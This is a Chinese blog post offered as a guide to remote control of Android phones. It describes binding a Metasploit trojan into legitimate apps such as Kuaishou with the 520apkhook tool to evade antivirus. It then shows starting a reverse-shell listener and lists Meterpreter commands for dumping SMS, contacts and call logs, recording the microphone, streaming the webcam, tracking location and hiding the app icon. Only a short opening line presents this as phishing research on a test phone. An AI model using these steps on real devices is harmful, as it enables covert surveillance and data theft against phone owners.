

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="FaNeF">
  <meta name="keywords" content="">
  
    <meta name="description" content="一、背景闲来无事，研究一下安卓的渗透，Hvv中也有很多钓鱼的案例，但几乎都是钓鱼邮件这类的，还没有这种渗透手机端的，并且疫情而来的远程办公，也让个人手机成为信息泄露的一种途径。 二、利用过程实验环境：Kali（MSF）、一台安卓手机（华为 Meta 8） 实验过程： 首先是做一个MSF的远控木马，但是鉴于手机也有各类杀软，所以需隐藏木马，这里找到了一款工具 https:&#x2F;&#x2F;github.com&#x2F;b">
<meta property="og:type" content="article">
<meta property="og:title" content="Android远控指南">
<meta property="og:url" content="http://example.com/2023/04/08/Android%E8%BF%9C%E6%8E%A7%E6%8C%87%E5%8D%97/index.html">
<meta property="og:site_name" content="FaNeF">
<meta property="og:description" content="一、背景闲来无事，研究一下安卓的渗透，Hvv中也有很多钓鱼的案例，但几乎都是钓鱼邮件这类的，还没有这种渗透手机端的，并且疫情而来的远程办公，也让个人手机成为信息泄露的一种途径。 二、利用过程实验环境：Kali（MSF）、一台安卓手机（华为 Meta 8） 实验过程： 首先是做一个MSF的远控木马，但是鉴于手机也有各类杀软，所以需隐藏木马，这里找到了一款工具 https:&#x2F;&#x2F;github.com&#x2F;b">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/Android%E8%BF%9C%E6%8E%A7%E6%8C%87%E5%8D%97/20230408231553440.png">
<meta property="og:image" content="http://example.com/Android%E8%BF%9C%E6%8E%A7%E6%8C%87%E5%8D%97/20230408231816943.png">
<meta property="og:image" content="http://example.com/Android%E8%BF%9C%E6%8E%A7%E6%8C%87%E5%8D%97/20230408232042656.png">
<meta property="article:published_time" content="2023-04-08T15:41:52.000Z">
<meta property="article:modified_time" content="2023-04-08T15:45:59.838Z">
<meta property="article:author" content="FaNeF">
<meta property="article:tag" content="Android">
<meta property="article:tag" content="攻防渗透">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/Android%E8%BF%9C%E6%8E%A7%E6%8C%87%E5%8D%97/20230408231553440.png">
  
  
  
  <title>Android远控指南 - FaNeF</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 5.4.2"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>FaNeF</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Android远控指南"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-04-08 23:41" pubdate>
          2023年4月8日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          24 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Android远控指南</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="一、背景"><a href="#一、背景" class="headerlink" title="一、背景"></a>一、背景</h2><p>闲来无事，研究一下安卓的渗透，Hvv中也有很多钓鱼的案例，但几乎都是钓鱼邮件这类的，还没有这种渗透手机端的，并且疫情而来的远程办公，也让个人手机成为信息泄露的一种途径。</p>
<h2 id="二、利用过程"><a href="#二、利用过程" class="headerlink" title="二、利用过程"></a>二、利用过程</h2><p><strong>实验环境</strong>：Kali（MSF）、一台安卓手机（华为 Meta 8）</p>
<p>实验过程：</p>
<p>首先是做一个MSF的远控木马，但是鉴于手机也有各类杀软，所以需隐藏木马，这里找到了一款工具</p>
<p><a target="_blank" rel="noopener" href="https://github.com/ba0gu0/520apkhook">https://github.com/ba0gu0/520apkhook</a></p>
<p>这个工具将木马捆绑到自定义的apk上，这里我尝试了豌豆荚、快手、微信的apk文件，只有微信的apk是不成功的其余都是可以捆绑上的。捆绑完成后会生成一个捆绑后的apk文件、handler.rc文件（msf的文件）</p>
<p>客户端已经准备完毕，我们只需要在kali上准备msf开启对应端口等待反弹shell即可</p>
<figure class="highlight aspectj"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs aspectj">msfconsole -r <span class="hljs-keyword">handler</span>.rc<br></code></pre></td></tr></table></figure>

<p><img src="/Android%E8%BF%9C%E6%8E%A7%E6%8C%87%E5%8D%97/20230408231553440.png" srcset="/img/loading.gif" lazyload alt="image-20230408231553440"></p>
<p>这里看我们的受害安卓设备还没有上线</p>
<p><img src="/Android%E8%BF%9C%E6%8E%A7%E6%8C%87%E5%8D%97/20230408231816943.png" srcset="/img/loading.gif" lazyload alt="image-20230408231816943"></p>
<p>当显示上图就意味着安卓客户端已经上线，这里是连了3个session，我们选择任意一个session即可</p>
<p><img src="/Android%E8%BF%9C%E6%8E%A7%E6%8C%87%E5%8D%97/20230408232042656.png" srcset="/img/loading.gif" lazyload alt="image-20230408232042656"></p>
<p>连接成功就可以输入对应的msf指令进行信息的窃取，当先是Died就意味着session中断了，这个的一大弱点就是session经常断。</p>
<h2 id="三、指令大全"><a href="#三、指令大全" class="headerlink" title="三、指令大全"></a>三、指令大全</h2><p>可以通过help命令查看</p>
<p><strong>1、文件操作</strong></p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">Command       Description<br><span class="hljs-comment">-------       -----------</span><br>cat           Read <span class="hljs-keyword">the</span> contents <span class="hljs-keyword">of</span> <span class="hljs-keyword">a</span> <span class="hljs-built_in">file</span> <span class="hljs-built_in">to</span> <span class="hljs-keyword">the</span> screen<br>cd            Change <span class="hljs-built_in">directory</span><br>checksum      Retrieve <span class="hljs-keyword">the</span> checksum <span class="hljs-keyword">of</span> <span class="hljs-keyword">a</span> <span class="hljs-built_in">file</span><br>cp            Copy source <span class="hljs-built_in">to</span> destination<br>dir           List <span class="hljs-built_in">files</span> (<span class="hljs-built_in">alias</span> <span class="hljs-keyword">for</span> ls)<br>download      Download <span class="hljs-keyword">a</span> <span class="hljs-built_in">file</span> <span class="hljs-keyword">or</span> <span class="hljs-built_in">directory</span><br>edit          Edit <span class="hljs-keyword">a</span> <span class="hljs-built_in">file</span><br>getlwd        Print <span class="hljs-built_in">local</span> working <span class="hljs-built_in">directory</span><br>getwd         Print working <span class="hljs-built_in">directory</span><br>lcd           Change <span class="hljs-built_in">local</span> working <span class="hljs-built_in">directory</span><br>lls           List <span class="hljs-built_in">local</span> <span class="hljs-built_in">files</span><br>lpwd          Print <span class="hljs-built_in">local</span> working <span class="hljs-built_in">directory</span><br>ls            List <span class="hljs-built_in">files</span><br>mkdir         Make <span class="hljs-built_in">directory</span><br>mv            Move source <span class="hljs-built_in">to</span> destination<br>pwd           Print working <span class="hljs-built_in">directory</span><br>rm            Delete <span class="hljs-keyword">the</span> specified <span class="hljs-built_in">file</span><br>rmdir         Remove <span class="hljs-built_in">directory</span><br>search        Search <span class="hljs-keyword">for</span> <span class="hljs-built_in">files</span><br>upload        Upload <span class="hljs-keyword">a</span> <span class="hljs-built_in">file</span> <span class="hljs-keyword">or</span> <span class="hljs-built_in">directory</span><br></code></pre></td></tr></table></figure>

<p><strong>2、网络操作</strong></p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs css">Command       Description<br>-------       -----------<br>ifconfig      <span class="hljs-attribute">Display</span> interfaces<br>ipconfig      <span class="hljs-attribute">Display</span> interfaces<br>portfwd       Forward <span class="hljs-selector-tag">a</span> local port <span class="hljs-selector-tag">to</span> <span class="hljs-selector-tag">a</span> remote service<br>route         View and modify the routing <span class="hljs-selector-tag">table</span><br></code></pre></td></tr></table></figure>

<p><strong>3、系统命令</strong></p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs smali">Command       Description<br>-------       -----------<span class="hljs-built_in"></span><br><span class="hljs-built_in">execute </span>      Execute a command<br>getuid        Get the user that the server is running as<br>localtime     Displays the target<span class="hljs-keyword"> system</span>&#x27;s local date<span class="hljs-built_in"> and </span>time<br>pgrep         Filter processes by name<br>ps            List running processes<br>shell         Drop into a<span class="hljs-keyword"> system</span> command shell<br>sysinfo       Gets information about the remote<span class="hljs-keyword"> system</span>, such as OS<br></code></pre></td></tr></table></figure>

<p><strong>4、屏幕操作</strong></p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs applescript">Command       Description<br><span class="hljs-comment">-------       -----------</span><br>screenshare   Watch <span class="hljs-keyword">the</span> remote user&#x27;s desktop <span class="hljs-keyword">in</span> <span class="hljs-built_in">real</span> <span class="hljs-built_in">time</span><br>screenshot    Grab a screenshot <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> interactive desktop<br></code></pre></td></tr></table></figure>

<p><strong>5、摄像头与麦克风操作</strong></p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">Command        Description<br><span class="hljs-comment">-------        -----------</span><br>record_mic     Record audio <span class="hljs-built_in">from</span> <span class="hljs-keyword">the</span> default microphone <span class="hljs-keyword">for</span> X <span class="hljs-built_in">seconds</span>（通过-d指定时间）<br>webcam_chat    Start <span class="hljs-keyword">a</span> video chat<br>webcam_list    List webcams<br>webcam_snap    Take <span class="hljs-keyword">a</span> snapshot <span class="hljs-built_in">from</span> <span class="hljs-keyword">the</span> specified webcam（通过空格+数字指定摄像头）<br>webcam_stream  Play <span class="hljs-keyword">a</span> video stream <span class="hljs-built_in">from</span> <span class="hljs-keyword">the</span> specified webcam<br></code></pre></td></tr></table></figure>

<p><strong>6、视频输出操作</strong></p>
<figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs cmake"><span class="hljs-keyword">Command</span>       Description<br>-------       -----------<br>play          play a waveform audio <span class="hljs-keyword">file</span> (.wav) <span class="hljs-keyword">on</span> the <span class="hljs-keyword">target</span> system<br></code></pre></td></tr></table></figure>

<p><strong>7、安卓命令</strong></p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">Command           Description<br><span class="hljs-comment">-------           -----------</span><br>activity_start    <span class="hljs-keyword">Start</span> an Android activity <span class="hljs-keyword">from</span> a Uri string<br>check_root        <span class="hljs-keyword">Check</span> <span class="hljs-keyword">if</span> device <span class="hljs-keyword">is</span> rooted<br>dump_calllog      <span class="hljs-keyword">Get</span> <span class="hljs-keyword">call</span> <span class="hljs-keyword">log</span><br>dump_contacts     <span class="hljs-keyword">Get</span> contacts list<br>dump_sms          <span class="hljs-keyword">Get</span> sms messages<br>geolocate         <span class="hljs-keyword">Get</span> <span class="hljs-keyword">current</span> lat-long <span class="hljs-keyword">using</span> geolocation<br>hide_app_icon     Hide the app icon <span class="hljs-keyword">from</span> the launcher<br>interval_collect  Manage <span class="hljs-type">interval</span> collection capabilities<br>send_sms          Sends SMS <span class="hljs-keyword">from</span> target <span class="hljs-keyword">session</span><br>set_audio_mode    <span class="hljs-keyword">Set</span> Ringer Mode<br>sqlite_query      Query a SQLite <span class="hljs-keyword">database</span> <span class="hljs-keyword">from</span> <span class="hljs-keyword">storage</span><br>wakelock          <span class="hljs-keyword">Enable</span>/<span class="hljs-keyword">Disable</span> Wakelock<br>wlan_geolocate    <span class="hljs-keyword">Get</span> <span class="hljs-keyword">current</span> lat-long <span class="hljs-keyword">using</span> WLAN information<br></code></pre></td></tr></table></figure>

<p><strong>8、应用控制操作</strong></p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs applescript">Command        Description<br><span class="hljs-comment">-------        -----------</span><br>app_install    Request <span class="hljs-keyword">to</span> install apk <span class="hljs-built_in">file</span><br>app_list       List installed apps <span class="hljs-keyword">in</span> <span class="hljs-keyword">the</span> device<br>app_run        Start Main Activty <span class="hljs-keyword">for</span> package <span class="hljs-built_in">name</span><br>app_uninstall  Request <span class="hljs-keyword">to</span> uninstall <span class="hljs-built_in">application</span><br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Android/">#Android</a>
      
        <a href="/tags/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/">#攻防渗透</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Android远控指南</div>
      <div>http://example.com/2023/04/08/Android远控指南/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>FaNeF</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年4月8日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/04/05/glibc%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86%E6%A6%82%E8%A6%81/" title="glibc内存管理概要">
                        <span class="hidden-mobile">glibc内存管理概要</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
